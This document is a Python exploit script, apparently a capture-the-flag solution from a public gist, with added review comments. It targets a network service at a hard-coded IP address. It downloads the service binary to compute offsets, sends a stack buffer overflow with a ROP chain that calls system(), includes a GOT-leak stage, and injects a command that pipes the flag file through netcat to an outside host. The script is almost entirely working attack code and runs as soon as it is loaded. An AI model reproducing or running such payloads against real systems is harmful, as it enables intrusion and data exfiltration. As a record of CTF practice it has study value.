
@peternguyen93
Created September 21, 2015 02:38
#!/usr/bin/python
import socket
import re
from capstone import *
from Pwn import *
import sys
# p = Pwn(mode=1,host='52.20.10.244',port=12351)
def disas(code):
    """Disassemble *code* as x86-64 and return the operand text only.

    Each decoded instruction contributes its ``op_str`` (mnemonics are
    dropped) and the pieces are concatenated with no separator.
    """
    decoder = Cs(CS_ARCH_X86, CS_MODE_64)
    # 0x1000 is the base address handed to capstone for the decoded bytes.
    return ''.join(insn.op_str for insn in decoder.disasm(code, 0x1000))
def getPortSize():
    """Download the blob served on port 8888 and extract three values from it.

    The connection is read until ``recv`` returns an empty result. From the
    collected data:

    * ``port``       -- 4 bytes at offset 0x7d5, decoded with ``Pwn.unpack``
    * ``size``       -- 4 bytes at offset 0x82f, decoded with ``Pwn.unpack``
    * ``stack_size`` -- the hex displacement in an ``rcx, qword ptr [rbp - N]``
      operand, disassembled from the 7 bytes at offset 0x824

    Returns the tuple ``(port, size, stack_size, blob)``.
    """
    conn = Pwn(host='52.20.10.244',port=8888)
    conn.connect()

    chunks = []
    chunk = conn.recv(1024)
    while len(chunk) > 0:
        chunks.append(chunk)
        chunk = conn.recv(1024)
    blob = ''.join(chunks)

    # The offsets are fixed; presumably they match one specific build of the
    # served binary -- TODO confirm against the file actually received.
    port = conn.unpack(blob[0x7d5:0x7d5 + 4])
    size = conn.unpack(blob[0x82f:0x82f + 4])
    operands = disas(blob[0x824:0x824 + 7])

    found = re.match(r'rcx, qword ptr \[rbp - ([0-9a-fx]*)\]', operands)
    # NOTE(review): when the operand text does not match, ``found`` is None and
    # the attribute access below raises AttributeError before close() runs,
    # so the connection is left open on that path.
    stack_size = int(found.group(1), 16)

    conn.close()
    return port, size, stack_size, blob
def getshell(p2, stack_size, system_addr, addr):
    """Send the overflow frame whose chain calls *system_addr* with *addr*.

    Frame layout, in order: the command string, 'A' padding up to
    ``stack_size - 8`` bytes, ``p2.p32(0x6)``, 'AAAA', eight 'C' bytes, then
    the chain packed by ``p2.pA``. After sending, control is handed to
    ``p2.io()``.

    NOTE(review): the gadget address and both address arguments are absolute
    values, so this presumably only holds against a non-PIE binary without a
    stack canary and with predictable stack/libc addresses -- confirm against
    the target build. Either mitigation would invalidate the constants.
    """
    command = 'cat flag | nc 128.199.171.28 8001;'
    padding = 'A' * (stack_size - 8 - len(command))
    # 0x6 is also the first argument given to write() in leak(); presumably it
    # keeps a local holding the socket descriptor intact -- TODO confirm.
    frame = command + padding + p2.p32(0x6) + 'AAAA' + 'C' * 8

    chain = [
        0x4008d3,  # pop rdi ; ret
        addr,
        system_addr,
    ]
    p2.send(frame + p2.pA(chain))
    p2.io()
def leak(p1, stack_size):
    """Send a frame that writes the GOT slot of ``listen`` back, print the reply.

    Frame layout: 'A' padding of ``stack_size - 8`` bytes, ``p1.p32(0x6)``,
    'AAAA', eight 'C' bytes, then the packed chain, which ends by returning
    to main. Two reads follow; only the second is printed (as ``repr``).

    Always returns 0: the step that would decode the reply into an address
    is commented out in the original, so callers never get a real value.
    """
    frame = 'A' * (stack_size - 8) + p1.p32(0x6) + 'AAAA' + 'C' * 8
    chain = [
        0x4008d3,  # pop rdi ; ret
        0x6,
        0x04008d1,  # pop rsi ; pop r15 ; ret
        p1.got('listen'),
        0x41414141,
        0x4005e0,  # write
        0x40077D,  # main
    ]
    p1.send(frame + p1.pA(chain))

    p1.recv(1024)  # first read is discarded
    reply = p1.recv(1024)
    print(repr(reply))

    return 0
def exploit():
    """Loop forever: read the current layout, then run the getshell stage.

    Each pass calls ``getPortSize()`` and prints the three values. When
    ``stack_size + 24`` exceeds the reported receive size the pass is skipped;
    otherwise a connection is opened to the reported port (with
    ``pfile='./bin.elf'``) and ``getshell`` is run on it. ``AttributeError``
    and ``socket.error`` are reported with a message and the loop retries.

    NOTE(review): ``system_addr`` and ``start`` are fixed absolute addresses,
    presumably recorded with address randomization disabled; with ASLR active
    they would not hold. The original also carries a commented-out stage that
    called ``leak()`` and derived ``system_addr`` from the ``listen`` address
    via ``get_libc_offset`` instead of hard-coding it.
    """
    system_addr = 0x7ffff7a5b640
    start = 0x7fffffffebc0 + 16

    while True:
        try:
            _port, size, stack_size, _blob = getPortSize()
            report = (
                ('[+] Bot at :', _port),
                ('[+] Recv size:', size),
                ('[+] Stack size:', stack_size),
            )
            for label, value in report:
                print('%s %s' % (label, value))

            # The frame needs stack_size + 24 bytes to fit in one receive.
            if (stack_size + 24) > size:
                print('Can\'t overflow')
                continue

            p2 = Pwn(mode=1,host='52.20.10.244',port=_port,pfile='./bin.elf')
            p2.connect()
            getshell(p2, stack_size, system_addr, start)
        except AttributeError:
            # Raised by getPortSize() when the operand pattern does not match.
            print('Suck ___^____^___')
        except socket.error:
            print('Fuck.........')
# Runs on import as well as on direct execution: there is no __main__ guard.
exploit()